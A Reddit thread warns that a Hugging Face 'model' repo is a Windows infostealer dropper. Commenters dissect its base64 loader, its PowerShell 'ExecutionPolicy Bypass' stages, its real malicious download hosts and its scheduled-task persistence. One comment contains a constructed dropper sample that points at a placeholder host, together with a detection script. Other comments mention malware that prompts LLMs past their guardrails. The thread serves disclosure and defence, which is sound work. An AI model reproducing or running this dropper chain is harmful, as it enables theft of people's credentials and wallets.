WARNING: Open-OSS/privacy-filter MALWARE
Posted by charles25565@reddit | LocalLLaMA | 131 comments
There's this new "model" on Hugging Face titled Open-OSS/privacy-filter which is actually a customized infostealer virus. It uses a Python-based dropper which downloads a malicious PowerShell command from the internet, which spawns another PowerShell command and downloads a shady EXE file and runs it using Task Scheduler.
Here's a behavior analysis of what the EXE does: https://tria.ge/260507-tnftrsfx5x/behavioral1
I also reported both the dropper and the EXE to Microsoft.
If you use Linux (which is easier to use for AI/ML) you are unaffected as this is a Windows virus.
Equivalent_Bit_461@reddit
linux chads win again
Shoddy-Tutor9563@reddit
--trust-remote-code has always been a bad option waiting for this to happen
charles25565@reddit (OP)
That feature has nothing to do with this. It is a custom inference script, not a modeling or configuration definition.
Player13377@reddit
244k downloads
Macmill_340@reddit
Likely botted...the repo seems to be disabled now
Knopty@reddit
Most likely the author just requested it 200k+ times via HF API. Huggingface seems to count model requests as a full download even if it's cached on disk without a real data transfer.
nmrk@reddit
Hey I would be careful disclosing specific techniques to the public.
sammcj@reddit
I had a look at the report of this message. I do not believe it is anything even close to irresponsible security disclosure. For starters it's not even a security issue. This is how poorly designed hit counters work.
Rancisv2@reddit
Security by obscurity, yeah exactly what this community truly supports, isn't it?
nmrk@reddit
Responsible Disclosure of security holes is everyone's duty. I will escalate this to the Mods to ask for their opinion.
Rancisv2@reddit
If that's the case then I totally agree with you
If the previous comment comes across as offensive, it's all my bad, sorry.
nmrk@reddit
Nah I'm not escalating to mods because of your comment. I'm escalating because of the irresponsible disclosure by u/Knopty. I think there should be a general policy about disclosing exploits in the subreddits.
Generally you would contact the developer directly to disclose the bug, before publicly disclosing how to exploit it.
Knopty@reddit
So, a documented behavior that they simply count HTTP requests as downloads is now an irresponsible bug disclosure?
https://huggingface.co/docs/hub/models-download-stats#how-are-downloads-counted-for-models
seamonn@reddit
Likely fake downloads. All of them done in the last 24 hours. Even the official Open AI version only has 165k downloads over 15 days.
MadPelmewka@reddit
Please send reports in caps. This is just nonsense. It's not even morning or a weekday in America right now, but the number 1 trending model is malware… this is just insane.
Velocita84@reddit
It is actually crazy that the repo is still up, what are hf staff even doing
DertekAn@reddit
Yeah, what's the point? Wtf?
-Cubie-@reddit
Looks like it's not deleted, but it's been "disabled" now
CabbageCZ@reddit
They've only now disabled it. Around 10 minutes ago it was still live lol
marutthemighty@reddit
Spam bots activated?
-Cubie-@reddit
The likes, too
Vusiwe@reddit
OpenClaw FTW
Material_Policy6327@reddit
Open source is gonna get hammered by all this
Fair-Spring9113@reddit
tia jan laughs
-Cubie-@reddit
Presumably all by the author(s) to try and boost legitimacy right?
Caffdy@reddit
this is why we can't have nice things
Velocita84@reddit
Another flawless linux W
a_beautiful_rhind@reddit
After copy-fail, let's not get too cocky. This shitty script would have been able to run as root.
thrownawaymane@reddit
Copyfail is so last week. Now there's dirtyfrag
a_beautiful_rhind@reddit
That one I think needs compiled code so it's not as blatant.
teleprint-me@reddit
It was disclosed, known about, patched, and released.
Vulnerabilities are bound to happen. With transparency, it's easy to dig into, figure out, expose it, then fix it.
Security through obscurity is simply theatre.
a_beautiful_rhind@reddit
Pure luck here. It was in the kernel for years. Could have been known and used for targeted attacks where they cleaned up after themselves. Reminded me of those win95 machines where you could press cancel to bypass the password prompt.
teleprint-me@reddit
Every time we use a computer and nothing happens, we're lucky.
Someone once asked me if and how it was possible to be safe on the net or in general. I said it's not. I said only if you get off of the net and write wares yourself. I still feel this is true to this day.
The only difference between a known bug and unknown bug is a false sense of security.
Velocita84@reddit
If the attacker had even remembered that Linux exists, most distros have already updated the kernel to a version with the exploit patched anyway
a_beautiful_rhind@reddit
If they remembered to update, if they could update, if they know about the attack. Lots of ifs.
donomo@reddit
yeah, a lot of Linux Mint users where the kernel is always a millennium behind
CheatCodesOfLife@reddit
they were probably unaffected by copy-fail anyway
LetsGoBrandon4256@reddit
I use Arch btw.
Velocita84@reddit
CachyOS btw
1337HxC@reddit
Gamer OS mentioned
1_________________11@reddit
You use arch btw
Velocita84@reddit
Both statements are true
1_________________11@reddit
You use arch btw
smashedshanky@reddit
Linux has to be a code word for Arch users
a_slay_nub@reddit
Surprisingly, I don't think wsl would have saved me. Apparently you can run powershell.exe from a wsl terminal.
wywywywy@reddit
WSL interop can be disabled if needed btw
smashedshanky@reddit
assume through wsl config? regardless wsl is really bad at scale when it comes to IO heavy tasks
tengo_harambe@reddit
How can you tell if someone uses Linux
teleprint-me@reddit
Cool-Chemical-5629@reddit
I saw the model on this particular "Open-OSS" account, maybe a day or two ago, and the first red flag for me was the insanely high number of likes it received in such a short time period and also, what's up with the secondary account with the OpenAI logo that tries to make it look official? But then I realized it could be some community account for OpenAI related stuff and maybe some sort of alternative / finetune version of the model. However, this model is not something I would personally have use for, so I did not end up going deeper into investigation to see if it's even legit or not, so it remained kinda on the border of suspicion, and if your information is true, then I suppose my suspicion was justified.
Bootes-sphere@reddit
Thanks for the warning. That's a critical catch. Always verify repos by checking the actual source code and maintainer history before installing anything that touches your system or data. If you're looking to add privacy/PII redaction to your local LLM workflows safely, there's an Apache 2.0 licensed gateway (https://github.com/aisecuritygateway/aisecuritygateway) you can self-host and audit yourself. No telemetry, full source available. But the real takeaway: never trust unfamiliar packages claiming to be security tools. Stick to well-established projects with transparent maintainers.
charles25565@reddit (OP)
Why are you super...enthusiastic about your product?
Microsort@reddit
Heads up if you downloaded that model, check your system for scheduled tasks and unusual powershell processes. 244k downloads is scary, hopefully HF takes it down fast.
charles25565@reddit (OP)
The malware deletes itself so the only way is checking the Windows Defender event log for settings changes.
TheRealMasonMac@reddit
GGUF when?
TastesLikeOwlbear@reddit
Llama.cpp has not been updated to support this model architecture yet. It looks like the work involved will be substantial due to the Powershell dependency.
mxcw@reddit
Came here for this comment only. Thanks
Much-Researcher6135@reddit
Answer. The. Question.
Velocita84@reddit
Hahahaha holy shit most obvious malware award
VoiceApprehensive893@reddit
atleast have the closedai model in your malware lmao
Colecoman1982@reddit
What's the chances that this is the first identified case of a vibecoded virus/malware?
TechnoByte_@reddit
It's by far not the first, vibecoded malware is common.
There's even malware that calls a LLM API to write itself in realtime
GiveMoreMoney@reddit
It would be even funnier if the malware calls the LLM, then uses a prompt bypass, to remove the guardrails from the LLM in question, and convince it to write the malware.
ShadyShroomz@reddit
that's fucking funny and wild but I wouldn't feel bad about yoinking their API keys & costing them a loooottt of money.
cantgetthistowork@reddit
I would like to see this one
Normal-Ad-7114@reddit
Tbh this doesn't look vibe coded, or at least it's like something gpt3 would vibe code. Modern LLMs are capable of very sophisticated malware. This is more of an insult.
Rancisv2@reddit
Is there a benchmark or something like that which evaluates the malware-writing capabilities of models?
Adamzxd@reddit
Imagine the person who made it infected himself too. A few times.
lordofwhee@reddit
They literally didn't even TRY to obfuscate it! As someone with a background in computer security I'm genuinely more offended by the sheer laziness than anything else.
redditscraperbot2@reddit
What do you mean? They hid it in the very discreet and not extremely alarming string of base64 text followed by a line telling the PC to download whatever that text decoded to.
Totally obfuscated. Like a ninja.
HellomyfriendNine@reddit
chatGPT would make better malware, this is far beyond a skill issue: loss = random.uniform(0.5 ,2)
smashedshanky@reddit
at that point it's the user's fault right
LetsGoBrandon4256@reddit
kek
isademigod@reddit
Improve your training rates exponentially with this one simple trick!
Zulfiqaar@reddit
print("Successfully.")
LetsGoBrandon4256@reddit
Either hand-written or the AI is fully immersed in the persona.
markole@reddit
Well, we wouldn't be talking about it if it was less obvious, most likely.
PANIC_EXCEPTION@reddit
BuildDevv@reddit
ELI 5 version from ChatGPT:
This code is malware because it's wearing a fake costume.
The "AI training" part is just decoration. It pretends to train a model by printing fake progress and saving a fake model file.
But near the bottom, it does the shady stuff:
base64.b64decode(...)
urllib.request.urlopen(...)
subprocess.Popen(["powershell.exe", "-ExecutionPolicy", "Bypass", ...])
ELI5:
Imagine someone gives you a toy robot and says, "Don't worry, it just dances."
But inside, the robot secretly:
Thatās what this script does.
It contacts a hidden internet address, downloads a command, then runs it through PowerShell with security bypass options. The fake āmodel trainingā code is just there to make it look harmless.
So yeah, this is basically: "I'm totally training an AI model bro" while secretly being a remote-control backdoor.
Velocita84@reddit
You don't need chatgpt to explain it, glance at the powershell.exe --executionpolicy bypass and it's hilariously obvious, they didn't even try to obfuscate that lmao
BuildDevv@reddit
The ELI5 was really more for the lurkers and non coders (like me). Thanks for the explanation too!!
Successful_Plant2759@reddit
This is exactly why model repos need to be treated like software packages, not inert weights. The dangerous bit is often the Python glue around the model: custom loaders, post-install scripts, PowerShell fetchers, etc. My default now is: no trust_remote_code, inspect repo history, run first in a disposable VM or container, and assume any privacy/security themed random upload is a higher-risk target.
CodNo2235@reddit
It's crazy how easily a seemingly harmless Python script can be weaponized to pull down PowerShell commands and sneak an EXE into the Task Scheduler. Definitely a win for the Linux side of local AI/ML development today, but a huge wake-up call for anyone running models on Windows
Equivalent-Costumes@reddit
This is scary. Anyone think this is some sort of nation-state attack? Like, it's not a sophisticated operation, but this is the kind of thing that shouldn't work at all, and I feel like small time hackers won't bother. This feels like a probe attempt to see if this attack is viable at all.
TechnoByte_@reddit
No, it's extremely badly written, one look at the code and anyone will see it's malware
More competent python malware hides itself in pre-compiled .whl files of dependencies
thrownawaymane@reddit
You are generally right that they would have done a better job. However, they are not above using lower tier bugs, there are times when you want something disposable especially if you want to complicate attribution
Momsbestboy@reddit
Wait, let me check and open a shell.
Where is my "You have no power here" meme?
shroddy@reddit
Not applicable here, because the malware would have just as much power on Linux as it has on Windows, it just decided to spare Linux this time.
thrownawaymane@reddit
One copyfail away from root
MadPelmewka@reddit
If Hugging Face had basic code checking (not necessarily even using an LLM), then surely no one would fall for this trick. (They could display the software's rating and what it does overall. One of the red flags is downloading something from an external source, though even that isn't a sure sign.)
-Cubie-@reddit
They check pickle files quickly with 5 antivirus files, but the loader.py file is currently "queued" in JFrog and Protect AI. ClamAV doesn't see an issue (but I'm not sure what kind of vulnerabilities it checks for).
Perhaps they should prioritize Python files with custom code just like how the model.safetensors was probably prioritized (which was confirmed "No issue" by JFrog and Protect AI)
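As an added defender-side example (not code from the thread, and not Hugging Face's or any scanner's own logic), here is a small static triage pass over a custom loader script that flags the shape the ELI5 above and this scanning discussion describe: a base64 literal that decodes to a URL, a network fetch, and a PowerShell launch with bypass-style flags, all in one file. The sample it scans is constructed with a placeholder URL, the JSON `cmd` field is taken from the thread's later breakdown, and the function names (`triage`, `verdict`, `decode_hidden_url`) are mine.

```python
import ast
import base64
import re

# Constructed stand-in for the kind of loader.py the thread describes: fake
# "training" output, then base64 -> urlopen -> PowerShell. The URL is a
# placeholder (example.invalid) and the JSON "cmd" field is assumed, not real.
_PLACEHOLDER_URL = "https://example.invalid/stage"
_ENCODED = base64.b64encode(_PLACEHOLDER_URL.encode()).decode()
SAMPLE_LOADER = f'''
import base64, json, subprocess, urllib.request
def train():
    for epoch in range(3): print("epoch", epoch, "loss", 0.5)
def _verify_checksum_integrity():
    url = base64.b64decode("{_ENCODED}").decode()
    data = json.loads(urllib.request.urlopen(url).read())
    subprocess.Popen(["powershell.exe", "-ExecutionPolicy", "Bypass",
                      "-WindowStyle", "Hidden", "-Command", data["cmd"]])
'''

DECODE_CALLS = {"b64decode", "b32decode", "b85decode", "a85decode", "decodebytes"}
FETCH_CALLS = {"urlopen", "urlretrieve", "get", "post"}
EXEC_CALLS = {"Popen", "run", "call", "check_output", "system", "startfile"}
SHELL_TOKENS = ("powershell", "executionpolicy", "bypass", "schtasks", "cmd.exe")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_hidden_url(literal):
    """If a string literal is base64 that decodes to an http(s) URL, return it."""
    if not B64_RE.fullmatch(literal):
        return None
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    return text if text.startswith(("http://", "https://")) else None

def triage(source):
    """Static pass over one Python file; returns (kind, lineno, detail) tuples."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            # bare callee name: attribute (base64.b64decode) or plain name (system)
            name = getattr(node.func, "attr", getattr(node.func, "id", ""))
            if name in DECODE_CALLS:
                findings.append(("decode", node.lineno, name))
            elif name in FETCH_CALLS:
                findings.append(("fetch", node.lineno, name))
            elif name in EXEC_CALLS:
                lits = [c.value for c in ast.walk(node)
                        if isinstance(c, ast.Constant) and isinstance(c.value, str)]
                shelly = any(t in " ".join(lits).lower() for t in SHELL_TOKENS)
                findings.append(("shell_exec" if shelly else "exec", node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = decode_hidden_url(node.value)
            if url:
                findings.append(("hidden_url", node.lineno, url))
    return findings

def verdict(findings):
    """Decode + fetch + exec in one file is the staged-dropper shape; flag it."""
    kinds = {k for k, _, _ in findings}
    if {"decode", "fetch"} <= kinds and kinds & {"shell_exec", "exec"}:
        return "staged-dropper-pattern"
    if kinds & {"shell_exec", "hidden_url"}:
        return "review-manually"
    return "no-dropper-pattern"

if __name__ == "__main__":
    print(verdict(triage(SAMPLE_LOADER)), triage(SAMPLE_LOADER))
```

This is a triage heuristic for prioritising review of repo Python files, not a verdict on its own; a legitimate loader that fetches weights over HTTP will land in "review-manually" rather than "no-dropper-pattern".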
thrownawaymane@reddit
Yeah if attackers know that there's a window where files aren't going to get scanned HF needs to fix that asap
They're still alive?
0xbyt3@reddit
HF finally blocked the repo but I was checking HF commit history. Anyone got that history by any chance? There were 5 commits before I could take a look.
Velocita84@reddit
It was just initial commit, file upload, then 3 commits fixing some "mistakes" in the readme and stripping the original run instructions
0xbyt3@reddit
Thanks for the info. I was wondering if the repo was clean initially, then switched to malware when it appeared on the trending page.
thrownawaymane@reddit
I know this technique is used elsewhere so maybe
Maleficent_Celery_55@reddit
The org name itself is a red flag. Open open source software.
omerkraft@reddit
First "open" means "open for business"...
Previous_Feeling_484@reddit
Open yo legs when you open the file
Just-Environment-189@reddit
Yes, but there's an actual company called Open source that dabbles in ML
Potential-Eye-9367@reddit
In cases like this, how should we ultimately measure the reliability of AI models and tools?
WithoutReason1729@reddit
Your post is getting popular and we just featured it on our Discord! Come check it out!
You've also been given a special flair for your contribution. We appreciate your post!
I am a bot and this action was performed automatically.
Mayion@reddit
How is the code executed? Sorry my knowledge of AI models stops at GGUFs. The repo seems taken down so I can't tell what was on it to tell.
charles25565@reddit (OP)
It used a custom Python script.
Mayion@reddit
Yes, I meant where was it stored and how was it executed? How did a model contain a python script sort of question.
JamesEvoAI@reddit
*laughs in Linux*
Beginning-Window-115@reddit
how did you figure that out
Kodix@reddit
I think there's literally no other model out there that starts its usage instructions with "go run this bat file to run arbitrary code". That's how.
Equivalent-Costumes@reddit
Yeah I was surprised when I saw the title, because there is no way a model can become malware, unless you literally give it enough tool calling and let it go rip in OpenCode or something. A model is mostly the weights to be run by some well-known engine.
Turned out the whole thing is literally to trick people into running random code.
Zulfiqaar@reddit
That's why we have models as .safetensors now instead of .ckpt, as that format can contain malicious code
ResidentPositive4122@reddit
Yes, there is. We now have safetensors but we used to have pickle, which is a pile of shit, exploitable in dozens of different ways. Then there's "--trust-remote-code" which has its purpose, but could also be used as a vector, depending on your inferencing stack.
Whatever this shit is, it's the temu version if it asks you to run something, lol.
Beginning-Window-115@reddit
lol true
MadPelmewka@reddit
The model just went and became number 1 in the trends for no reason whatsoever. The Community tab is disabled. The organization was created recently and it only has one model. All users look similar to each other in name. It's 100% auto-registration.
stormy1one@reddit
Sadly I expect more of this to continue - even Reddit is filled with people advertising solutions they created, masquerading as safe legit open source
yrro@reddit
good work
marutthemighty@reddit
Holy hell. Here we go again.
Thank you for keeping us informed of this.
Zulfiqaar@reddit
For anyone curious - Quick vibe-cyber-analysis with Codex-Claude-Kimi swarm
The setup path is the trap. The model card tells people to run:
start.bat
python loader.py
On Windows, start.bat runs python loader.py before dependency installation. The malicious logic is in loader.py, around lines 41-54. It defines a function called _verify_checksum_integrity(), but it is not verifying a checksum. It:
- cmd field from that JSON,
That means a Hugging Face "model loader" is performing remote command execution.
High-level attack chain
The chain I observed is:
- loader.py prints fake ML/training-looking output and writes a dummy model.pkl.
- loader.py decodes and contacts https://jsonkeeper.com/b/AVNNE.
- https://api.eth-fastscan.org/update.bat.
- update.bat runs an encoded PowerShell stage.
- %TEMP%, %LOCALAPPDATA%, and %APPDATA%.
- https://api.eth-fastscan.org/sefirah.
- MicrosoftEdgeUpdateTaskCore... scheduled task with /rl HIGHEST.
This is a staged malware chain. It is not just suspicious style or sloppy setup code.
The model.safetensors and tokenizer.json files are not real model weights. They are tiny Git LFS pointer files (135 and 133 bytes respectively). The actual multi-gigabyte model data is missing. Even if you had LFS installed, the entrypoint (loader.py) never loads them; it instantiates a DummyModel and runs fake "training" instead.
Final payload clues
The final payload from api.eth-fastscan.org/sefirah is a Windows x64 PE32+ executable (GUI) x86-64. Static strings found include scripts for (chromium+gecko), cookies, Discord, crypto-wallets, virtual machines, screenshots, files/debug, and anti-anti-virus checks. If you ran it on Windows:
- MicrosoftEdgeUpdateTaskCore*.
- %TEMP%, %LOCALAPPDATA%, and %APPDATA%.
- .exe files under those same directories.
Caveats
File/path indicators:
- %TEMP%\update.bat
- %TMP%\runner.ps1
- %TMP%\node.b64
- %TEMP%\3unlb3il.exe
- %LOCALAPPDATA%\3unlb3il.exe
- %APPDATA%\3unlb3il.exe
Earlier same-session variant names:
- %TEMP%\ee37tru1.exe
- %LOCALAPPDATA%\ee37tru1.exe
- %APPDATA%\ee37tru1.exe
Scheduled task indicators:
- MicrosoftEdgeUpdateTaskCoree4oiubht
- MicrosoftEdgeUpdateTaskCoreeqgjv6uh
- MicrosoftEdgeUpdateTaskCore plus random-looking suffix
- /sc onstart
- /rl HIGHEST
Process/command indicators:
- ExecutionPolicy Bypass
- WindowStyle Hidden
- Start-Process -Verb RunAs
- Add-MpPreference -ExclusionPath
- Remove-MpPreference -ExclusionPath
- schtasks /create, /run, /delete
Razen94@reddit
It is STILL up! What the hell are the mods at huggingface doing? Is there like 1 dude online trying to work through 1000 reports?
Colecoman1982@reddit
Something, something, Windows IS the virus, something, something... ;-)
TechnoByte_@reddit
Lol the amount of times I've seen python (cross-platform language) malware check if you're on Windows and exit otherwise...
MadPelmewka@reddit
I analyzed the auto-reg accounts (the ones that liked this model) and if you look at them:
https://huggingface.co/julian-thompson138/activity/likes
https://huggingface.co/andrew-parker536/activity/likes
https://huggingface.co/asher-young606/activity/likes
https://huggingface.co/evelyn-harris614/activity/likes
https://huggingface.co/mason-williams418/activity/likes
https://huggingface.co/zoey-phillips333/activity/likes
Maybe there's more than one malware...
They all have these repositories in their likes:
https://huggingface.co/anthfu/DeepSeek-V4-Pro
https://huggingface.co/anthfu/Bonsai-8B-gguf
https://huggingface.co/anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
https://huggingface.co/anthfu/Qwopus-GLM-18B-Merged-GGUF
They're already closed due to a violation, yet the same accounts are liking Open-OSS/privacy-filter and Hugging Face doesn't seem to find this suspicious...
Or maybe it's just some guy botting likes for his own repos like an idiot.
Velocita84@reddit
Totally not suspicious at all
charles25565@reddit (OP)
It might be some type of star farm service that reused the same accounts.
hust921@reddit
I was totally expecting it to harvest info, passed to the privacy filter. Rather than just download random malware. Seems like a missed opportunity.
TechnoByte_@reddit
That's way too complex for the people behind them, most malware on the internet is just vibecoded/bought infostealers nowadays
charles25565@reddit (OP)
Such a thing would really only work with custom code models, but they easily could do both.
JLeonsarmiento@reddit
Oh no
AutonomousHangOver@reddit
Quick analysis of the Python. It opens a base64'd url that has an app that downloads a base64'd app etc. At the end:
This is a Windows information-stealer with credential, browser, crypto-wallet, and Discord theft modules, plus DLL-injection and anti-analysis capabilities. Do not run it. If a script in a Hugging Face repo silently downloaded and executed it, treat any machine that ran it as fully compromised.
ba67720dd115293ec5a12d08be6b0ee982227a4c5e4662fb89269c76556df6e0f36a662ca22f1934e3a56f111e6df19159807616…, crates: tokio 1.52.1, flate2, miniz_oxide, rand_chacha, serde_json, hex, crc32fast, gimli, getrandom)
api.eth-fastscan.org → 89.124.93.110. The name is designed to evoke etherscan.io / a blockchain scanner; it has no relation to either.
ZCEyPFOYr0MWyHDQJZO4@reddit
So loader.py unencodes a base64 url which contains a powershell command to run a batch file that contains a base64 encoded command, which itself contains a base64 powershell script to download a compiled rust program that steals data from chrome, winscp, etc.
No_Lingonberry1201@reddit
Every time I see a base64/Fernet/etc. string literal in the code I know I'm in for a good time.
Raredisarray@reddit
Thanks for sharing!!